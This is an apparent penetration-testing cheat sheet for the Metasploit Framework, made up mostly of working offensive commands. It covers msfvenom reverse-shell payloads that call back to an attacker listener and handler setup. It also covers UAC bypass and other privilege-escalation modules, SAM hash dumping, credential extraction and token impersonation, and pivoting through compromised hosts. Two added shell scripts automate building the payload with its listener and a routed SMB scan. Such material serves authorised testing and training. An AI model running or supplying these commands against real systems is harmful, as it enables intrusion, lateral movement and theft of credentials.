Metasploit

The Metasploit Framework is an open-source penetration testing and ethical hacking tool developed by Rapid7. It provides a number of tools to exploit vulnerabilities in computer systems, networks, and applications.

Below are some useful Metasploit commands.

MSFVenom Commands

MSFVenom can be used to generate payloads which are compatible with Metasploit.

Task: List MSFVenom payloads
How:
  msfvenom --list payloads
Notes: Shows supported payloads. Stageless payloads are designated with an underscore between stage and transport, e.g. windows/shell_reverse_tcp, whereas staged payloads use a slash, e.g. windows/shell/reverse_tcp.

Task: Generate a Windows payload
How:
  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f exe > shell-win-x64.exe
Notes: Match the payload architecture to the target. If a 32-bit payload is executed on a 64-bit host, you will need to migrate into an x64 process before extracting hashes. The handler must be started with the same PAYLOAD, LHOST and LPORT.

Task: Generate a Linux payload
How:
  msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f elf > shell-lin-x64
Notes: Mark the output executable (chmod +x shell-lin-x64) before running it on the target.

Session Management

The following commands can be used to manage sessions.

Task: Start a handler
How:
  use exploit/multi/handler
  set LHOST 172.23.168.66
  set LPORT 6666
  set ExitOnSession false
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  exploit -jz
Notes: LHOST can also be set to an interface name, such as eth0. ExitOnSession false keeps the listener active after the first session connects. exploit -jz runs the handler as a background job (-j) without interacting with new sessions (-z). PAYLOAD, LHOST and LPORT must match the values the payload was generated with.

Task: Process migration
How:
  run post/windows/manage/migrate
Notes: Run from within Meterpreter (migrate <pid> also works). Useful for stability, e.g. before the spawning process exits, and to move from a 32-bit to a 64-bit process.

Task: Session management
How:
  sessions -i <id>
  background
  sessions -u <id>
Notes: sessions -i interacts with a session; background (typed inside the session) returns it to the background; sessions -u upgrades a standard reverse shell session to a Meterpreter session.

Task: Channel management
How:
  channel -i <id>
  channel -l
Notes: Within Meterpreter, -i interacts with a channel and -l lists available channels.

Task: Jobs
How:
  jobs -l
  jobs -k <id>
Notes: Jobs are background tasks such as handlers. They can be listed with jobs -l and killed with jobs -k <id>.
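The MSFVenom and handler commands above are two halves of one procedure, and the listener fails silently when its PAYLOAD, LHOST or LPORT differ from what was compiled into the binary. The following shell script is an added example, not code from the original page or from Metasploit: it classifies a payload name as staged or stageless and as x86 or x64 using the naming convention described under MSFVenom, then builds the binary with msfvenom and a matching exploit/multi/handler resource script from the same variables. The payload names, 192.168.1.1, port 6666 and the output path /tmp/shell-win-x64 are illustrative values; msfvenom and msfconsole are assumed to be on PATH.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): generate a payload and a handler
# resource script from the same PAYLOAD/LHOST/LPORT so they cannot drift apart.
# Assumes msfvenom/msfconsole on PATH; all addresses and paths are illustrative.

# Stageless payloads join the stage name and transport in one path component with
# an underscore (windows/shell_reverse_tcp, windows/x64/meterpreter_reverse_https);
# staged payloads split them with a slash (windows/x64/meterpreter/reverse_tcp).
# Heuristic based on that naming convention; cmd/ "single" payloads are not classified.
payload_is_stageless() {
  case "${1##*/}" in
    *_reverse_*|*_bind_*) return 0 ;;
    *) return 1 ;;
  esac
}

# Architecture implied by the payload path: x64 if it carries an /x64/ component,
# otherwise x86 (Metasploit's convention for the windows/ and linux/ trees).
payload_arch() {
  case "$1" in
    */x64/*) echo x64 ;;
    *) echo x86 ;;
  esac
}

# Default msfvenom output format per platform prefix.
payload_format() {
  case "$1" in
    windows/*) echo exe ;;
    linux/*) echo elf ;;
    *) echo raw ;;
  esac
}

# Write the handler resource script. ExitOnSession false keeps the listener alive
# after the first shell; exploit -jz backgrounds the job without interacting.
write_handler_rc() {
  local payload=$1 lhost=$2 lport=$3 out=$4
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -jz
EOF
}

# Build the binary and the matching handler script.
# Usage: ./gen.sh windows/x64/meterpreter/reverse_tcp 192.168.1.1 6666 /tmp/shell-win-x64
generate() {
  local payload=$1 lhost=$2 lport=$3 base=$4 fmt kind
  fmt=$(payload_format "$payload")
  command -v msfvenom >/dev/null || { echo "msfvenom not found on PATH" >&2; return 1; }
  msfvenom -p "$payload" LHOST="$lhost" LPORT="$lport" -f "$fmt" -o "$base.$fmt" || return 1
  write_handler_rc "$payload" "$lhost" "$lport" "$base.rc"
  if payload_is_stageless "$payload"; then kind=stageless; else kind=staged; fi
  echo "built $base.$fmt ($(payload_arch "$payload"), $kind)"
  echo "start the listener with: msfconsole -q -r $base.rc"
}

# Only run when invoked with the four arguments; sourcing the file just defines the functions.
if [ "$#" -eq 4 ]; then
  generate "$@"
fi
```

The staged/stageless split matters for the handler as well as for the binary: a stageless payload carries the whole Meterpreter and only needs the handler to match the transport, while a staged one depends on the handler sending the correct stage, so a PAYLOAD typo on either side produces a connection that opens and immediately dies.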

Privilege Escalation

Some useful modules for common privilege escalation tasks. The following article provides more information on using these modules:

https://www.bordergate.co.uk/windows-privilege-escalation/

Task: Enumerate privileges
How:
  getprivs
Notes: Attempts to enable all privileges available to the current process and lists those that are enabled.

Task: Exploit weak service permissions
How:
  use exploit/windows/local/service_permissions

Task: Exploit unquoted service paths
How:
  use exploit/windows/local/unquoted_service_path

Task: Search for vulnerabilities that may lead to privilege escalation
How:
  use post/multi/recon/local_exploit_suggester
Notes: Set SESSION to the session to check. The output is a list of candidate local exploits that still need to be verified against the host.

Task: Enumerate installed applications
How:
  use post/windows/gather/enum_applications

Task: Exploit systems that have AlwaysInstallElevated set
How:
  use exploit/windows/local/always_install_elevated

Task: Bypass UAC
How:
  use exploit/windows/local/bypassuac

Task: Enumerate local AV exclusions
How:
  use post/windows/gather/enum_av_excluded
Notes: Excluded paths are candidates for dropping payloads without the AV engine scanning them.

Credentials

Commands for extracting credentials. There are a lot of additional application-specific modules under post/windows/gather/credentials/.

Task: Dump the SAM database
How (as an administrative user):
  getsystem
  hashdump
Notes: Hashes can be cracked, or used for pass-the-hash attacks. On a 64-bit host run this from a 64-bit Meterpreter process (see Process migration above).

Task: Extract other credentials
How:
  load kiwi
  creds_all
Notes: May include plaintext credentials on older versions of Windows. Requires SYSTEM (or an equivalent elevated token) and a process architecture matching the host.

Task: User impersonation
How:
  load incognito
  list_tokens -u
  impersonate_token "bordergate.local\\Administrator"
  getuid
Notes: The incognito command is impersonate_token; the backslash in the DOMAIN\user name must be doubled when typed into the Meterpreter console. Use rev2self to revert to the previous user context.

Task: Extract Unattend.xml credentials
How:
  use post/windows/gather/enum_unattend

Task: Search for credentials
How:
  search -f *.ppk
Notes: The example looks for PuTTY private key files.

Task: Group Policy Preference file extraction
How:
  use post/windows/gather/credentials/gpp
Notes: For a domain-joined system; recovers passwords stored in GPP XML files, which are encrypted with a publicly documented AES key.

Pivoting

The following commands are useful for identifying other hosts and networks that can be attacked through a compromised host.

Task: Add routes
How:
  run autoroute -s 192.168.19.0/24
Guidance: Run from within the Meterpreter session that can reach the subnet. Use run autoroute -p to view active routes. From msfconsole the same can be done with post/multi/manage/autoroute (set SESSION and SUBNET).

Task: Configure a SOCKS proxy
How:
  use auxiliary/server/socks_proxy
  set VERSION 4a
  set SRVPORT 9050
  run
Guidance: VERSION and SRVPORT should match the values configured in /etc/proxychains4.conf (e.g. socks4 127.0.0.1 9050), and routes must already have been added with autoroute. To use the proxy: proxychains -q nmap -Pn -n -F -sT 192.168.1.1 (a TCP connect scan; SYN scans and ICMP do not work through SOCKS).

Task: Port forward to destination
How:
  meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1
Guidance: Forwards port 8080 on the Kali system to port 80 on 192.168.1.1, which is then reachable as http://127.0.0.1:8080.

Task: Ping sweep
How:
  use post/multi/gather/ping_sweep
  set RHOSTS 192.168.1.0/24
  set SESSION 1
  run
Guidance: A quick way of mapping new subnets. The sweep is run from the compromised host, so it does not need a route.

Task: ARP scan
How:
  run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
Guidance: ARP scan of the local subnet; finds hosts that do not respond to ping.

Task: Review network configuration
How:
  ipconfig
  netstat
Guidance: Look for active connections which may indicate trust relationships between hosts, and for previously unidentified subnets.

Task: Port scan (via pivot)
How:
  use auxiliary/scanner/portscan/tcp
Guidance: Make sure routes are added with autoroute beforehand. Scanner modules honour Metasploit routes, whereas db_nmap runs Nmap locally and does not.

Task: Reverse DNS lookup
How:
  use post/multi/gather/dns_reverse_lookup
Guidance: Useful for finding the names of newly routed targets.

Metasploit Database

The database can be used to store scan results, credentials and loot.

Task: Initialise the database
How:
  systemctl start postgresql
  sudo msfdb init
  msf6 > db_status
Guidance: Required before the database functionality can be used; db_status should report that the postgresql connection is active.

Task: Configure a workspace
How:
  workspace -a myworkspace   (add a new workspace)
  workspace                  (list workspaces)
  workspace myworkspace      (switch to a workspace)
Guidance: Workspaces keep the data from separate tests apart.

Task: Nmap scanning
How:
  db_nmap -sV -A 192.168.1.0/24
Guidance: Scan using standard Nmap arguments and store the results in the PostgreSQL database. db_nmap runs Nmap locally, so it does not go through Metasploit routes.

Task: List database contents
How:
  hosts
  services
Guidance: Lists stored hosts and services respectively.

Task: Export database contents
How:
  services -o /tmp/services.txt
  hosts -o /tmp/hosts.txt
Guidance: Exports hosts or services to a CSV text file.

Task: Set RHOSTS
How:
  services -p 445 -R
Guidance: Sets RHOSTS to every host with port 445 recorded in the database. This is very useful when combined with RC scripts.

Scripting

Task: Save commands
How:
  makerc /tmp/commands.rc
Guidance: Saves the commands executed in the current console session to a resource file.

Task: Execute saved commands
How:
  msfconsole -r /tmp/commands.rc
Guidance: Runs the saved commands at startup. From an already running console use resource /tmp/commands.rc.
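The pivoting, database and scripting sections describe one workflow: route a subnet through a session, scan it with a module that honours routes, set RHOSTS from the database, and run further modules against the result. The script below is an added example, not the original page's or Metasploit's own code: it writes a resource script that does exactly that, to be loaded into a console that already holds the session with resource /tmp/pivot-smb.rc. Session id 1, the subnet 192.168.19.0/24, port 445, the auxiliary/scanner/smb/smb_version module and the workspace name client-a are assumed values.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): emit a Metasploit resource script that
# pivots a port scan through an existing session and feeds the results from the
# database into a follow-up module. Session id, subnet and workspace are assumed.

# write_pivot_rc SESSION SUBNET_CIDR WORKSPACE OUTFILE
write_pivot_rc() {
  local session=$1 subnet=$2 workspace=$3 out=$4
  # autoroute takes SUBNET and NETMASK separately (NETMASK accepts the "/24" CIDR form);
  # the scanner module takes the CIDR directly.
  local net=${subnet%/*} bits=${subnet#*/}
  cat > "$out" <<EOF
workspace -a $workspace
use post/multi/manage/autoroute
set SESSION $session
set SUBNET $net
set NETMASK /$bits
run
use auxiliary/scanner/portscan/tcp
set RHOSTS $subnet
set PORTS 445
set THREADS 10
run
services -p 445 -R
use auxiliary/scanner/smb/smb_version
run
hosts -o /tmp/$workspace-hosts.txt
EOF
}

# Usage: ./pivot-rc.sh 1 192.168.19.0/24 client-a /tmp/pivot-smb.rc
# then, in msfconsole with session 1 open:  resource /tmp/pivot-smb.rc
if [ "$#" -eq 4 ]; then
  write_pivot_rc "$@"
  echo "wrote $4; load it with: resource $4"
fi
```

Order is the point of the script: the route has to exist before auxiliary/scanner/portscan/tcp runs, the scan has to finish before services -p 445 -R can populate RHOSTS, and db_nmap is deliberately avoided because Nmap does not see Metasploit's routes. Workspace -a also switches to the new workspace, so the exported hosts file contains only this engagement's data.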

Search Commands

Without filtering, searching for generic terms often returns far too many results. Search filters reduce the amount of output returned.

Task: Search for exploits only
How:
  search type:exploit name:tomcat
Guidance: Type can be exploit, auxiliary, post, payload or encoder.

Task: Search by platform
How:
  search platform:windows name:gather

Task: Remove unwanted results
How:
  grep -v DoS grep -v local search type:exploit name:tomcat
Guidance: grep filters the output of the command that follows it, so it must be placed before the search command; each grep -v removes the lines matching its pattern.